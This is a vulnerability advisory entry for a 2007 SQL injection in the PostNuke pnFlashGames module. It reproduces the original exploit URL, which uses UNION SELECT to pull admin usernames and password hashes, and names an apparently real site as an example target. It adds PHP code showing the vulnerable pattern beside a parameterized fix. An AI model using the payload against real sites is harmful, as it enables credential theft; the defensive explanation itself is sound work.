PNFlashGames PostNuke Module 'Index.PHP' SQL Injection Vulnerability

Vulnerability ID: 1112816
Vulnerability type: SQL injection
Published: 2007-04-28
Updated: 2007-05-04
CVE: CVE-2007-2427
CNNVD ID: CNNVD-200705-010
Platform: PHP
CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/3813
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-010
|Details
index.php in the PostNuke pnFlashGames module contains a SQL injection vulnerability: the cid parameter is placed into a database query without validation, so a remote attacker can execute arbitrary SQL statements through it.
|Exploit
============================================================

PostNuke pnFlashGames Module v1.5 Remote SQL Injection 

============================================================

Found by: xoron


xoron.biz

+

Love's the funeral of hearts

The funeral of hearts
And a plea for mercy
When love is a gun
Separating me from you

:(

============================================================

Exploit: 
index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*

============================================================

Example: http://andersonvision.com/PostNuke/
============================================================

# milw0rm.com [2007-04-28]
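The root cause is an unvalidated cid value interpolated into the SQL string. The following is an added example, not pnFlashGames' or PostNuke's own code: it reconstructs the vulnerable pattern beside a hardened version that validates cid as a positive integer and binds it as a query parameter. The table pn_flashgames and its columns pn_cid and pn_title are hypothetical placeholders; only the cid parameter and the pn_users columns come from the advisory.

```php
<?php
// Added example (not the module's own code). pn_flashgames / pn_cid / pn_title
// are hypothetical names; pn_users / pn_uid / pn_uname / pn_pass are from the advisory.

// Vulnerable pattern: cid is concatenated unchanged, so a value such as
// "-1/**/union/**/select ..." becomes part of the statement.
function viewGameVulnerable(PDO $db, array $get): array
{
    $cid = $get['cid'];
    $sql = "SELECT pn_cid, pn_title FROM pn_flashgames WHERE pn_cid = $cid";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: reject anything that is not a positive integer, then bind
// the value as a parameter so it can never alter the statement's structure.
function viewGameHardened(PDO $db, array $get): array
{
    $cid = filter_var($get['cid'] ?? null, FILTER_VALIDATE_INT,
                      ['options' => ['min_range' => 1]]);
    if ($cid === false) {
        throw new InvalidArgumentException('cid must be a positive integer');
    }
    $stmt = $db->prepare('SELECT pn_cid, pn_title FROM pn_flashgames WHERE pn_cid = :cid');
    $stmt->bindValue(':cid', $cid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Self-contained demonstration on an in-memory SQLite database (constructed data).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pn_flashgames (pn_cid INTEGER, pn_title TEXT)');
$db->exec('CREATE TABLE pn_users (pn_uid INTEGER, pn_uname TEXT, pn_pass TEXT)');
$db->exec("INSERT INTO pn_flashgames VALUES (1, 'Tetris')");
$db->exec("INSERT INTO pn_users VALUES (2, 'admin', 'constructed-hash')");

// Same shape as the advisory's payload, reduced to the two columns this query selects.
$payload = '-1/**/union/**/select/**/pn_uname,pn_pass/**/from/**/pn_users/**/where/**/pn_uid=2';

print_r(viewGameVulnerable($db, ['cid' => $payload]));   // returns the pn_users row
try {
    viewGameHardened($db, ['cid' => $payload]);
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";                   // payload never reaches SQL
}
print_r(viewGameHardened($db, ['cid' => '1']));          // legitimate lookup still works
```

Run with the pdo_sqlite extension enabled; the validation step alone blocks this payload, and the bound parameter protects against any cid value that does get past the filter in other code paths.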
|References

BID 23701: http://www.securityfocus.com/bid/23701
MILW0RM 3813: http://www.milw0rm.com/exploits/3813
OSVDB 35474: http://osvdb.org/35474
XF pnflashgames-index-sql-injection (33960): http://xforce.iss.net/xforce/xfdb/33960
VUPEN ADV-2007-1581: http://www.frsirt.com/english/advisories/2007/1581
SECUNIA 25043: http://secunia.com/advisories/25043